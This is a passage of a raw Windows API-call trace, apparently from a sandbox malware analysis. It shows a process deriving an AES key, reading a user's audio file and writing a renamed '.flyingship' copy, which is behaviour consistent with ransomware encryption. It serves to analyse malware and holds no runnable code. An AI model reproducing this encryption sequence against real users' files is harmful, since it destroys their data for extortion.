| out: lpMsg=0x87e7c4) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.751] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.751] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.751] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.751] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.751] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.751] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.751] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.752] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.752] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.752] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.752] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.752] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.752] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.753] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0184.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.753] CryptDestroyHash (hHash=0x90af58) returned 1 [0184.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\snzbfu-3qx.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.755] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.755] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0184.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0184.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0184.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0184.761] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz")) returned 0x10 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0184.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\snzbfu-3qx.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0184.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0184.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0184.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0184.765] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0184.765] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0184.769] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb3f, lpOverlapped=0x0) returned 1 [0184.769] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0184.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0184.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10b3f) returned 0xbea018 [0184.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0184.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0184.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10b3f) returned 0xbfab60 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10b3f) returned 0xbea018 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: 